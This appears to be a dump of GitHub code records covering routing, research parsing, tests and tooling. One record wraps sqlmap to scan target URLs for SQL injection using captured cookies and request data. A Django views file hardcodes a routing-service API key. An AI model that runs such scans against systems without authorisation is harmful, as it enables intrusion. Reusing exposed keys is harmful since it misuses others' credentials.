(\"\".join(arr).replace(\"--\",\"-\").strip('-'))\n\n\ndashatize(974302)","repo_name":"Alhajsalem/codewars_challenges","sub_path":"python/5kyu_directions_reduction.py","file_name":"5kyu_directions_reduction.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31160444297","text":"import json\nimport dns.resolver as dnsres\nimport dns.reversename as dnsrever\n\n# Opening JSON file\nf = open('../../result/CaseStudy/speedcheckerToSquatters.json', )\n\n# returns JSON object as\n# a dictionary\ndata = json.load(f)\n# print(len(data))\nset_of_internal_looking_ASes = []\nset_of_external_looking_ASes = []\nset_of_unresponsive = []\ndic_val = {}\nall_the_ases_considered = []\nind = 0\nfor t in data:\n to_keep = []\n rtt_list = []\n list_of_dns = []\n as_mapping = []\n ind +=1\n at_least_one_responsive = False\n # print(t['ASN'],t['Tracert'])\n for s in t['Tracert']:\n # print(s)\n to_keep.append(s['IP'])\n rtt_list.append(s['PingTime'])\n as_mapping.append(s['ASN'])\n all_the_ases_considered.append(s['ASN'])\n # try:\n # domain_address = dnsrever.from_address(s['IP'])\n # dns = str(dnsres.query(domain_address, 'PTR')[0])\n # print(dns)\n # except:\n dns = ''\n list_of_dns.append(dns)\n\n # list_of_dns.append(s['HostName'])\n if s['IP'] != '*':\n # print(t['ASN'],s)\n at_least_one_responsive = True\n if t['ASN'] != s['ASN']:\n # set_of_external_looking_ASes.append(t['ASN'])\n outside = True\n at_least_one_responsive = False\n if outside:\n set_of_internal_looking_ASes.append(t['ASN'])\n # dic_val[ind] = [to_keep, rtt_list, as_mapping, list_of_dns]\n elif at_least_one_responsive:\n set_of_external_looking_ASes.append(t['ASN'])\n dic_val[ind] = [to_keep, rtt_list, as_mapping,as_mapping, list_of_dns]\n else:\n set_of_unresponsive.append(t['ASN'])\n outside = False\n# [to_keep, rtt_list,new_mapping,as_mapping,list_of_dns]\nprint(len(set(set_of_internal_looking_ASes)))\nprint(len(set(set_of_external_looking_ASes)))\n# print(data)\nprint(list(set(set_of_unresponsive)))\nprint('Number of Probes in Speedchecker considered:')\nprint(len(list(set(set_of_unresponsive)))+len(set(set_of_internal_looking_ASes))+len(set(set_of_external_looking_ASes)))\n# print(dic_val)\nwith open(\"example_of_external_speedchecker.json\", 'w') as fout:\n json_dumps_str = json.dumps(dic_val)\n print(json_dumps_str, file=fout)\n","repo_name":"Burdantes/IPv4Squatting","sub_path":"scripts/CaseStudy/Parsing_Speedchecker.py","file_name":"Parsing_Speedchecker.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26477641101","text":"from test.BaseCase import BaseCase\n\n\nclass TestUpdateContact(BaseCase):\n\n @BaseCase.login\n @BaseCase.grant_access(\"/contact/update_contact\")\n def test_ok(self, token):\n self.db.insert({\"id\": 2, \"name\": \"My Entity\"}, self.db.tables[\"Entity\"])\n self.db.insert({\n \"id\": 1,\n \"entity_id\": 2,\n \"type\": \"PHONE NUMBER\",\n \"representative\": \"ENTITY\",\n \"name\": None,\n \"value\": \"+123456896\",\n }, self.db.tables[\"EntityContact\"])\n\n payload = {\n \"id\": 1,\n \"entity_id\": 2,\n \"type\": \"EMAIL ADDRESS\",\n \"representative\": \"ENTITY\",\n \"name\": None,\n \"value\": \"test@domain.com\",\n }\n\n response = self.application.post('/contact/update_contact',\n headers=self.get_standard_post_header(token),\n json=payload)\n\n contact = self.db.get(self.db.tables[\"EntityContact\"], {\"id\": 1})\n\n self.assertEqual(200, response.status_code)\n self.assertEqual(len(contact), 1)\n self.assertEqual(contact[0].type, \"EMAIL ADDRESS\")\n self.assertEqual(contact[0].representative, \"ENTITY\")\n self.assertEqual(contact[0].name, None)\n self.assertEqual(contact[0].value, \"test@domain.com\")\n","repo_name":"CybersecurityLuxembourg/openxeco-core","sub_path":"oxe-api/test/resource/contact/test_update_contact.py","file_name":"test_update_contact.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"14995037246","text":"import csv\nimport io\nimport json\nimport os\nimport math\n\nfrom decimal import *\n\nimport overpy\nfrom django.core import serializers\nfrom django.conf import settings\nfrom django.http import (Http404, HttpResponse, HttpResponseBadRequest,\n HttpResponseNotAllowed, JsonResponse)\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views.decorators.clickjacking import xframe_options_exempt\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import viewsets, generics\n\nfrom haversine import haversine, haversine_vector, Unit\n\nfrom .models import Route, Stop, Journey, StopWeight, StopInfo, Feedback\nfrom .serializers import RouteSerializer, StopSerializer, JourneySerializer\n\n\nclass StopViewSet(viewsets.ModelViewSet):\n queryset = Stop.objects.all().order_by('name')\n serializer_class = StopSerializer\n\nclass RouteViewSet(viewsets.ModelViewSet):\n queryset = Route.objects.all().order_by('name')\n serializer_class = RouteSerializer\n\ndef upload_stops(request):\n stops_file_name = \"api/stops_dodoma.csv\"\n stops_file = open(os.path.join(settings.BASE_DIR, stops_file_name), \"r\")\n data_set = stops_file.read()\n io_string = io.StringIO(data_set)\n next(io_string)\n for col in csv.reader(io_string, delimiter=',', quotechar=\"|\"):\n _, created = Stop.objects.update_or_create(\n name=col[2],\n lat=col[3],\n lon=col[4]\n )\n return HttpResponse(\"Data set loaded\")\n\n@xframe_options_exempt\ndef get_route(request):\n if request.method != \"GET\":\n return HttpResponseNotAllowed(\"Methods other than GET not allowed\")\n\n start_stop = (request.GET['start_lat'],request.GET['start_lon'])\n final_stop = (request.GET['final_lat'],request.GET['final_lon'])\n\n from_loc = request.GET['from']\n to_loc = request.GET['to']\n \n if (start_stop == None) or (final_stop == None):\n return HttpResponseBadRequest(\"Start and/or Final stops not set\")\n\n overpassApi = overpy.Overpass()\n\n # fetch the real lat and lon\n start_stop, final_stop = getStartAndFinalStops(start_stop, overpassApi, final_stop)\n\n # find the origin route\n start_route = Route.objects.filter(bus_stops__lat=start_stop[0])\n start_route = start_route.filter(bus_stops__lon=start_stop[1]).first()\n\n # find the destination route\n final_route = Route.objects.filter(bus_stops__lat=final_stop[0])\n final_route = final_route.filter(bus_stops__lon=final_stop[1]).first()\n\n print(\"Start Route: \", start_route)\n print(\"Final Route: \", final_route)\n \n if (start_route == None) or (final_route == None):\n raise Http404(\"Start/Final Stop not in any route\")\n\n # the stops are in a route, calculate the waypoints\n common_stops = []\n mid_stop = None\n\n common_stops = start_route.bus_stops.filter(pk__in=final_route.bus_stops.all())\n mid_stop = common_stops[len(common_stops) - 1]\n multiple_routes = True if (common_stops.count() != start_route.bus_stops.count()) else False\n\n locations = []\n bus_stops = []\n\n routes = [start_route, final_route]\n start_cost = 0\n final_cost = 0\n cost = 0\n \n notify_stops = []\n notify_stops.append(start_route.bus_stops.all()[len(start_route.bus_stops.all()) - 1])\n if multiple_routes:\n start_stops = start_route.bus_stops.filter(\n stopinfo__weight=StopWeight.ROUTABLE\n ).all()\n stop = Stop.objects.get(lat=start_stop[0], lon=start_stop[1])\n s_stop_info = StopInfo.objects.get(route=start_route, stop=stop)\n if start_route.forward:\n start_bus_stops = \\\n start_stops.filter(stopinfo__order__gte=s_stop_info.order).distinct()\n else:\n start_bus_stops = \\\n reversed(\n start_stops.filter(stopinfo__order__lte=s_stop_info.order).distinct()\n )\n\n count = StopInfo.objects.filter(route=start_route).count()\n start_cost = calculate_cost(start_route, s_stop_info, count)\n\n final_stops = final_route.bus_stops.filter(\n stopinfo__weight=StopWeight.ROUTABLE\n ).all()\n stop = Stop.objects.get(lat=final_stop[0], lon=final_stop[1])\n f_stop_info = StopInfo.objects.get(route=final_route, stop=stop)\n print(final_stops)\n if final_route.forward:\n final_bus_stops = \\\n final_stops.filter(stopinfo__order__lte=f_stop_info.order).distinct()\n else:\n final_bus_stops = \\\n reversed(\n final_stops.filter(stopinfo__order__gte=f_stop_info.order).distinct())\n count = StopInfo.objects.filter(route=final_route).count()\n final_cost = calculate_cost(final_route, f_stop_info, count)\n\n cost = start_cost + final_cost\n\n bus_stops = []\n for s in start_bus_stops:\n bus_stops.append(s)\n\n locations.append([mid_stop.lat, mid_stop.lon])\n bus_stops.append(mid_stop)\n \n for s in final_bus_stops:\n bus_stops.append(s)\n\n print(bus_stops)\n\n else:\n mid_stop = None\n routes = [start_route]\n\n start_stops = start_route.bus_stops.filter(\n stopinfo__weight=StopWeight.ROUTABLE\n ).all()\n stop = Stop.objects.get(lat=start_stop[0], lon=start_stop[1])\n s_stop_info = StopInfo.objects.get(route=start_route, stop=stop)\n if start_route.forward:\n start_bus_stops = \\\n start_stops.filter(stopinfo__order__gte=s_stop_info.order).distinct()\n else:\n start_bus_stops = \\\n reversed(\n start_stops.filter(stopinfo__order__lte=s_stop_info.order).distinct()\n )\n \n count = StopInfo.objects.filter(route=start_route).count()\n cost = calculate_cost(start_route, s_stop_info, count)\n\n print(locations)\n\n # journey = Journey\n start_stop_obj = Stop.objects.filter(lat=start_stop[0], lon=start_stop[1]).first()\n final_stop_obj = Stop.objects.filter(lat=final_stop[0], lon=final_stop[1]).first()\n\n # bus_stops.insert(0, start_stop_obj)\n # bus_stops.append(final_stop_obj)\n print(\"Routing Stops: \", bus_stops)\n\n journey = Journey.objects.create(\n from_location=from_loc,\n to_location=to_loc,\n start_stop=start_stop_obj,\n final_stop=final_stop_obj,\n mid_stop=mid_stop,\n start_cost=start_cost,\n final_cost=final_cost,\n cost=cost,\n )\n for s in notify_stops:\n journey.notify_stops.add(s)\n for r in routes:\n journey.routes.add(r)\n for s in bus_stops:\n journey.routing_stops.add(s)\n journey.save()\n serializer = JourneySerializer(Journey.objects.filter(id=journey.id).first())\n return JsonResponse(serializer.data, safe=True)\n\n@csrf_exempt\ndef feedback(request):\n received_feedback = request.POST['feedback']\n user = request.POST['user']\n feedback = Feedback(user=user, feedback=received_feedback)\n feedback.save()\n return HttpResponse(\"Feedback added successfully!\")\n\ndef calculate_cost(route:Route, stopInfo:StopInfo, count:int):\n cost = route.fee\n if route.fixed_fee:\n return cost\n\n count = StopInfo.objects.filter(route=route).count()\n if (cost >= 500) and route.forward:\n if (stopInfo.order / count) <= 0.75:\n cost = 0.6666 * cost\n cost = round(cost / 100)\n cost = cost * 100\n elif (cost >= 500) and (not route.forward):\n if (stopInfo.order / count) <= 1.333:\n cost = 0.666 * cost\n cost = round(cost / 100)\n cost = cost * 100\n\n return cost\n\n \n\ndef get_latest_journey(request):\n journey = Journey.objects.all().last()\n return JsonResponse(json.dumps(journey.directions), safe=False)\n\nclass GetRoute(generics.ListAPIView):\n serializer_class = JourneySerializer\n\n def get_queryset(self):\n if request.method != \"GET\":\n return HttpResponseNotAllowed(\"Methods other than GET not allowed\")\n\n start_stop = (request.GET['start_lat'],request.GET['start_lon'])\n final_stop = (request.GET['final_lat'],request.GET['final_lon'])\n \n if (start_stop == None) or (final_stop == None):\n return HttpResponseBadRequest(\"Start and/or Final stops not set\")\n\n overpassApi = overpy.Overpass()\n\n # fetch the real lat and lon\n start_stop, final_stop = getStartAndFinalStops(start_stop, overpassApi, final_stop)\n\n # find the origin route\n start_route = Route.objects.filter(bus_stops__lat=start_stop[0])\n start_route = start_route.filter(bus_stops__lon=start_stop[1]).first()\n\n # find the destination route\n final_route = Route.objects.filter(bus_stops__lat=final_stop[0])\n final_route = final_route.filter(bus_stops__lon=final_stop[1]).first()\n \n if (start_route == None) or (final_route == None):\n return Http404(\"Start/Final Stop not in any route\")\n\n # the stops are in a route, calculate the waypoints\n common_stops = []\n mid_stop = None\n\n common_stops = start_route.bus_stops.filter(pk__in=final_route.bus_stops.all())\n mid_stop = common_stops[len(common_stops) - 1]\n multiple_routes = True if (common_stops.count() != start_route.bus_stops.count()) else False\n\n locations = []\n bus_stops = []\n\n routes = [start_route, final_route]\n cost = 0\n\n notify_stops = []\n notify_stops.append(start_route.bus_stops.all()[len(start_route.bus_stops.all()) - 2])\n if multiple_routes:\n cost = 1000\n for s in start_route.bus_stops.all():\n locations.append([s.lon, s.lat])\n bus_stops.append(s)\n print(\"Adding: \", s.name)\n if (s.lat == mid_stop.lat) and (s.lon == mid_stop.lon):\n print(\"Broke at: \", s)\n break\n \n # print(final_route.bus_stops.all())\n \n # final_route.bus_stops.reverse()\n final_stops = final_route.bus_stops.all()\n size = final_stops.count()\n print(size)\n for i in range(size - 1,0,-1):\n print(\"Adding: \", final_stops[i].name)\n # the mid stop has already been added\n if (final_stops[i].lat == mid_stop.lat) and (final_stops[i].lon == mid_stop.lon):\n continue\n\n bus_stops.append(final_stops[i])\n locations.append([final_stops[i].lon, final_stops[i].lat])\n if (final_stops[i].lat == float(final_stop[0])) and (final_stops[i].lon == float(final_stop[1])):\n notify_stops.append(final_stops[i+1])\n print(\"Broke at: \", s)\n break\n else:\n cost = 500\n routes = [final_route]\n for r in start_route.bus_stops.all():\n locations.append([r.lon, r.lat])\n if (r.lat == float(final_stop[0])) and (r.lon == float(final_stop[1])):\n print(\"Broke at: \", r)\n break\n\n print(locations)\n\n routing_client = ORS(\n api_key=\"5b3ce3597851110001cf62483a24528b22554895b20e36724d991206\",\n retry_over_query_limit=False,\n )\n\n \"\"\" calculated_route = routing_client.directions(\n locations=locations,\n profile='driving-car',\n instructions=True,\n continue_straight=True\n ) \"\"\"\n\n # journey = Journey\n start_stop_obj = Stop.objects.filter(lat=start_stop[0], lon=start_stop[1]).first()\n final_stop_obj = Stop.objects.filter(lat=final_stop[0], lon=final_stop[1]).first()\n\n journey = Journey(\n start_stop=start_stop_obj,\n final_stop=final_stop_obj,\n mid_stop=mid_stop,\n cost=cost\n )\n journey.save()\n\ndef getStartAndFinalStops(start_stop, overpassApi, final_stop):\n start_stop = (\n Decimal(start_stop[0]).normalize(), \n Decimal(start_stop[1]).normalize())\n final_stop = (\n Decimal(final_stop[0]).normalize(), \n Decimal(final_stop[1]).normalize())\n\n selectedStartStop = tuple()\n selectedFinalStop = tuple()\n\n earthCircumference = 40_030_173.59204115\n\n startDistance = earthCircumference\n finalDistance = earthCircumference\n\n stops = StopInfo.objects.all().distinct()\n stopLatAndLongs = []\n for s in stops:\n currentTuple = (float(s.stop.lat), float(s.stop.lon))\n calcStartDistance = haversine(\n start_stop, currentTuple, unit=Unit.METERS)\n calcFinalDistance = haversine(\n final_stop, currentTuple, unit=Unit.METERS)\n\n if calcStartDistance < startDistance:\n startDistance = calcStartDistance\n selectedStartStop = (s.stop.lat, s.stop.lon)\n\n if calcFinalDistance < finalDistance:\n finalDistance = calcFinalDistance\n selectedFinalStop = (s.stop.lat, s.stop.lon)\n\n\n return selectedStartStop, selectedFinalStop\n\ndef intersection(routeA, routeB):\n tupA = map(tuple, routeA)\n tupB = map(tuple, routeB)\n return list(map(list, set(tupA).intersection(tupB)))","repo_name":"mepowerleo10/BusPoint-Server","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72745666650","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom chtscan.chtscan import Scanner\n\n\nclass sqli(Scanner):\n def get_setting(self):\n self.scanner_exe = 'sqlmap'\n return dict(\n scanner_exe='/usr/share/sqlmap/sqlmap.py',\n out_dir='/tmp/',\n )\n\n def get_cmd(self):\n cmd = [\n self.get_setting()['scanner_exe'],\n \"--batch\",\n \"-u\", self.req.url,\n \"-v\", \"0\",\n \"--level=2\",\n \"--disable-coloring\",\n \"--text-only\",\n \"--purge-output\",\n \"--user-agent\", self.req.ua,\n \"-o\",\n \"--crawl=0\",\n \"--output-dir\", self.get_setting()['out_dir'],\n ]\n\n if self.req.referer:\n cmd.extend((\"--referer\", self.req.referer))\n\n if len(self.req.cookie) > 0:\n cmd.extend([\"--cookie\", \"%s\" % self.req.cookie])\n\n if self.req.method == \"POST\":\n cmd.extend((\"--method\", \"POST\"))\n if self.req.data:\n cmd.extend((\"--data\", self.req.data))\n\n return cmd\n\n def get_detail(self):\n self.vuln_type = \"sqli\"\n report = re.findall(r'\\n Payload:(.*?)\\n', self.result[0])\n if len(report) == 0: return\n\n if len(self.req.cookie) > 0:\n report.append(\"Cookie: \" + self.req.cookie)\n self.detail = report\n","repo_name":"erevus-cn/pocscan","sub_path":"chtscan/scanner/sqlc.py","file_name":"sqlc.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":517,"dataset":"github-code","pt":"32"} +{"seq_id":"16540791945","text":"import os\nimport argparse\nimport xml.etree.ElementTree as ET\n\n\nMAKE_CORPUS_PATH = lambda f: os.path.join(os.path.dirname(__file__), \"./corpus/\" + f)\n\n\ndef extract(file_path):\n if not os.path.isfile(file_path):\n raise Exception(\"Abstract file does not found.\")\n root = ET.parse(file_path)\n root.findall(\".\")\n\n file_path = MAKE_CORPUS_PATH(\"abstracts.txt\")\n stream = open(file_path, mode=\"w\", encoding=\"utf-8\")\n\n for doc in root.findall(\"./doc\"):\n abs = doc.find(\"./abstract\").text\n if not abs:\n continue\n elif abs.startswith((\"|\", \"thumb\", \"{\", \"・\", \")\", \"(\", \"link\")):\n continue\n title = doc.find(\"./title\").text.replace(\"Wikipedia: \", \"\")\n\n if abs and title:\n stream.write(title + \"\\n\")\n stream.write(abs + \"\\n\")\n \n stream.close()\n\n\ndef concat(dir, prefix):\n if not os.path.isdir(dir):\n raise Exception(\"directory is not found\")\n \n paths = []\n def fetch(_dir):\n files = os.listdir(_dir)\n for f in files:\n p = os.path.join(_dir, f)\n if os.path.isfile(p) and f.startswith(prefix):\n paths.append(p)\n if os.path.isdir(p):\n fetch(p)\n \n fetch(dir)\n file_path = MAKE_CORPUS_PATH(prefix + \"_all.txt\")\n with open(file_path, mode=\"w\", encoding=\"utf-8\") as o:\n for p in paths:\n print(\"concat {}.\".format(p))\n with open(p, mode=\"r\", encoding=\"utf-8\") as f:\n for line in f:\n o.write(line)\n\n\ndef wakati(file_path):\n from janome.tokenizer import Tokenizer\n path, ext = os.path.splitext(file_path)\n wakati_path = path + \"_wakati\" + ext\n\n tokenizer = Tokenizer()\n\n def wsplit(text):\n ws = []\n tokens = tokenizer.tokenize(text.strip())\n for t in tokens:\n w = t.surface.strip()\n if w:\n ws.append(w)\n return ws\n\n with open(file_path, mode=\"r\", encoding=\"utf-8\") as f:\n with open(wakati_path, mode=\"w\", encoding=\"utf-8\") as w:\n for line in f:\n words = wsplit(line)\n w.write(\" \".join(words) + \"\\n\")\n\n\ndef tokenize(file_path, vocab_size):\n import MeCab\n path, ext = os.path.splitext(file_path)\n vocab_path = path + \".vocab\"\n tokenized_path = path + \"_tokenized\" + ext\n UNKNOWN = 0\n\n tagger = MeCab.Tagger(\"-Owakati\")\n tagger.parse(\"\")\n\n def wsplit(text):\n ws = []\n node = tagger.parseToNode(text.strip())\n while node:\n w = node.surface.strip()\n if w:\n ws.append(w)\n node = node.next\n \n return ws\n\n # make vocab file\n print(\"making vocabulary dictionary...\")\n vocab = {}\n with open(file_path, mode=\"r\", encoding=\"utf-8\") as f:\n for line in f:\n words = wsplit(line)\n for w in words:\n if w in vocab:\n vocab[w] += 1\n else:\n vocab[w] = 1\n\n dictionary = [UNKNOWN] + sorted(vocab, key=vocab.get, reverse=True)\n dictionary = dictionary[:vocab_size]\n with open(vocab_path, mode=\"w\", encoding=\"utf-8\") as v:\n v.write(\"\\n\".join([str(_v) for _v in dictionary]))\n\n # make tokenized file\n print(\"tokenize by vocabulary dictionary...\") \n with open(file_path, mode=\"r\", encoding=\"utf-8\") as f:\n with open(tokenized_path, mode=\"w\", encoding=\"utf-8\") as t:\n for line in f:\n words = wsplit(line)\n tokens = [dictionary.index(w) if w in dictionary else UNKNOWN for w in words]\n t.write(\" \".join([str(_t) for _t in tokens]) + \"\\n\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Utility Parser\")\n parser.add_argument(\"path\", type=str, help=\"target path\")\n parser.add_argument(\"--extract\", action=\"store_const\", const=True, default=False, help=\"extract abstract xml\")\n parser.add_argument(\"--wakati\", action=\"store_const\", const=True, default=False, help=\"separate japanese text (You need janome)\")\n parser.add_argument(\"--concat\", type=str, help=\"concatenate files that matches the pattern in target directory\")\n parser.add_argument(\"--tokenize\", type=int, default=-1, help=\"make vocab file and tokenize target file. vocab size is directed size. (You need MeCab)\")\n\n args = parser.parse_args()\n path = args.path\n if path.startswith(\"/\"):\n path = os.path.join(os.path.dirname(__file__), path)\n\n if args.extract:\n extract(path)\n elif args.wakati:\n wakati(path)\n elif args.concat:\n concat(path, args.concat)\n elif args.tokenize > 0:\n tokenize(path, args.tokenize)\n","repo_name":"icoxfog417/fastTextJapaneseTutorial","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"32"} +{"seq_id":"35817902145","text":"from collections import OrderedDict\n\nfrom plenum.common.messages.fields import IterableField, NonNegativeNumberField\nfrom plenum.common.messages.node_messages import OldViewPrePrepareRequest\n\nEXPECTED_FIELDS = OrderedDict([\n (\"instId\", NonNegativeNumberField),\n (\"batch_ids\", IterableField),\n])\n\n\ndef test_has_expected_type():\n assert OldViewPrePrepareRequest.typename == \"OLD_VIEW_PREPREPARE_REQ\"\n\n\ndef test_has_expected_fields():\n actual_field_names = OrderedDict(OldViewPrePrepareRequest.schema).keys()\n assert list(actual_field_names) == list(EXPECTED_FIELDS.keys())\n\n\ndef test_has_expected_validators():\n schema = dict(OldViewPrePrepareRequest.schema)\n for field, validator in EXPECTED_FIELDS.items():\n assert isinstance(schema[field], validator)\n","repo_name":"hyperledger/indy-plenum","sub_path":"plenum/test/input_validation/message_validation/test_old_view_preprepare_req_message.py","file_name":"test_old_view_preprepare_req_message.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"32"} +{"seq_id":"21242642948","text":"from flask import request\n\nfrom fate_flow.utils import job_utils\nfrom fate_flow.utils.api_utils import get_json_result, error_response\nfrom fate_arch.common import file_utils\n\n\n@manager.route('/job_config/get', methods=['POST'])\ndef get_config():\n kwargs = {}\n job_configuration = None\n\n for i in ('job_id', 'role', 'party_id'):\n if request.json.get(i) is None:\n return error_response(400, f\"'{i}' is required.\")\n kwargs[i] = str(request.json[i])\n\n for i in ('component_name', 'task_id', 'task_version'):\n if request.json.get(i) is None:\n break\n kwargs[i] = str(request.json[i])\n else:\n try:\n job_configuration = job_utils.get_task_using_job_conf(**kwargs)\n except Exception:\n pass\n\n if job_configuration is None:\n job_configuration = job_utils.get_job_configuration(kwargs['job_id'], kwargs['role'], kwargs['party_id'])\n\n if job_configuration is None:\n return error_response(404, 'Job not found.')\n\n return get_json_result(data=job_configuration.to_dict())\n\n\n@manager.route('/json_conf/load', methods=['POST'])\ndef load_json_conf():\n job_conf = file_utils.load_json_conf(request.json.get(\"config_path\"))\n return get_json_result(data=job_conf)\n","repo_name":"FederatedAI/FATE-Flow","sub_path":"python/fate_flow/scheduling_apps/operation_app.py","file_name":"operation_app.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"32"} +{"seq_id":"16678517170","text":"import pathlib\nfrom setuptools import find_packages, setup\n\n# The directory containing this file\nHERE = pathlib.Path(__file__).parent\n\n# The text of the README file\nREADME = (HERE / \"README.md\").read_text()\n\n# This call to setup() does all the work\nsetup(\n name=\"toggl-report\",\n version=\"1.0.7\",\n description=\"Generate PDF report from toggl\",\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/alexzelenuyk/toggl-report-to-gulp\",\n author=\"Oleksii Zeleniuk\",\n license=\"MIT\",\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.8\",\n ],\n packages=find_packages(exclude=(\"test\",)),\n include_package_data=True,\n install_requires=[\"fpdf\", \"iso8601\", \"requests\"],\n entry_points={\n \"console_scripts\": [\n \"toggl_report=cli:main\",\n ]\n },\n)\n","repo_name":"alexzelenuyk/toggl-report-to-gulp","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30149757317","text":"\"\"\"\r\n\n\nCreate a function that gets every pair of numbers from an array that **sums up\nto eight** and returns it as an array of pairs (sorted ascendingly). See the\nfollowing examples for more details.\n\n### Examples\n\n sums_up([1, 2, 3, 4, 5]) ➞ [[3, 5]]\n \n sums_up([1, 2, 3, 7, 9]) ➞ [[1, 7]]\n \n sums_up([10, 9, 7, 2, 8]) ➞ []\n \n sums_up([1, 6, 5, 4, 8, 2, 3, 7]) ➞ [[2, 6], [3, 5], [1, 7]]\n // [6, 2] first to complete the cycle (to sum up to 8)\n // [5, 3] follows\n // [1, 7] lastly\n // the pair that completes the cycle is always found on the left\n // [2, 6], [3, 5], [1, 7] sorted according to cycle completeness, then pair-wise.\n\n### Notes\n\n * Remember the idea of _\"completes the cycle first\"_ when getting the sort order of the pairs.\n * Only unique numbers are present in the array.\n * Return an **empty array** if nothing sums up to eight.\n\n\"\"\"\r\n\ndef sums_up(lst):\n d={}\n ml=[]\n l=[]\n for p in range(len(lst)):\n if p ==len(lst)-1:\n if lst[p]+z[e]==8:\n l.append(lst[p])\n l.append(z[e])\n l.append(len(lst)-1)\n ml.append(l)\n l=[]\n break\n z=lst[p+1:]\n for e in range(len(z)):\n if lst[p]+z[e]==8:\n l.append(lst[p])\n l.append(z[e])\n l.append(e+p)\n ml.append(l)\n l=[]\n ml.sort(key=lambda x:x[2])\n print(ml)\n for r in range(len(ml)):\n ml[r]=ml[r][0:2]\n ml[r].sort()\n d[\"pairs\"]=ml\n return d\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"uWW8cZymSkrREdDpQ_18.py","file_name":"uWW8cZymSkrREdDpQ_18.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70298193371","text":"'''\n--------------------\nModule: b64_b32_2\n--------------------\nDescription: \n - b64_b32 is a module to split 64bits chunk into\n two 32bits chunks.\n--------------------\nInput: \n - 8 bytes - stream.\n--------------------\nOutput:\n - 4 bytes - stream.\n--------------------\ntiming:\n - This module guarantee that no extra overhead will be \n introduced.\n--------------------\nNotes :\n - the module assume that it reads data from FIFO, which mean that\n whenever the valid signal is 1, it will always be one till latching it.\n - the module assume that it write data to AXI stream interface, data only\n transfered when both valid_out=1 and i_busy=0.\n - this module is optional and can be used with axi_hp[reader/writer]\n and it is not related to LJ92 core.\n--------------------\n'''\n\nfrom nmigen import *\nfrom nmigen.cli import main\nfrom nmigen.back import *\nimport clk_domains\n\nclass B64B32_2(Elaboratable):\n\n def __init__(self):\n\n #data in\n self.data_in = Signal(64)\n\n #data out\n self.data_out = Signal(24)\n\n #signals\n self.valid_in = Signal(1)\n self.valid_out = Signal(1)\n\n self.o_busy = Signal(1, reset=1) #I'm busy\n self.i_busy = Signal(1) #next busy\n\n self.ios = \\\n [self.valid_in, self.valid_out, self.o_busy, self.i_busy] + \\\n [self.data_out, self.data_in]\n\n def elaborate(self, platform):\n\n m = Module()\n\n clk_domains.load_clk(m)\n\n # register to hold data\n reg = Signal(64)\n reg_valid = Signal(1)\n reg_tobe_invalid = Signal(1)\n half_latched = Signal(1)\n\n # wire o_busy\n wire_obusy = Signal(1)\n m.d.full += self.o_busy.eq(wire_obusy)\n\n m.d.comb += [\n reg_tobe_invalid.eq(0),\n # ordinary this module is busy and will only go to un-busy\n # if data is present in fifo and the register is empty.\n wire_obusy.eq(1),\n ]\n\n # valid input data, and there is no data in register or this data\n # will not be needed next cycle, then register the data.\n with m.If((self.valid_in==1) & ((reg_valid==0) | (reg_tobe_invalid==1))):\n m.d.full += [\n reg.eq(self.data_in),\n reg_valid.eq(1),\n ]\n m.d.comb += [\n wire_obusy.eq(0),\n ]\n\n # if there is valid data in the register but there is no valid data in the\n # output, out the first half and set valid_out to 1.\n with m.If((reg_valid==1) & (self.valid_out==0) & (half_latched==0)):\n m.d.full += [\n self.data_out.eq(reg[40:64]),\n self.valid_out.eq(1),\n half_latched.eq(1),\n ]\n\n # if and output operation occurred [(self.i_busy==0) and (self.valid_out==1)]\n # and there is valid data in register, then output the correct half.\n with m.If((reg_valid==1) & (self.i_busy==0) & (self.valid_out==1)):\n with m.If(half_latched==1):\n m.d.full += [\n self.data_out.eq(reg[16:40]),\n self.valid_out.eq(1),\n half_latched.eq(0),\n ]\n # in the last half, if there is no valid data ready the the \n # reg_valid will turn to be 0.\n m.d.comb += [\n reg_tobe_invalid.eq(1),\n ]\n with m.If(self.valid_in==0):\n m.d.full += [\n reg_valid.eq(0),\n ]\n with m.Else():\n m.d.full += [\n self.data_out.eq(reg[40:64]),\n self.valid_out.eq(1),\n half_latched.eq(1),\n ]\n\n # if output operation occurred, and the reg_valid remains 0, then\n # valid_out will turn to be 0.\n with m.If((reg_valid==0) & (self.i_busy==0) & (self.valid_out==1)):\n m.d.full += [\n self.valid_out.eq(0),\n ]\n\n return m\n\nif __name__ == \"__main__\":\n d = B64B32_2()\n main(d, ports=d.ios)","repo_name":"FaresMehanna/JPEG-1992-lossless-encoder-core","sub_path":"migen_src/b64_b32_2.py","file_name":"b64_b32_2.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} 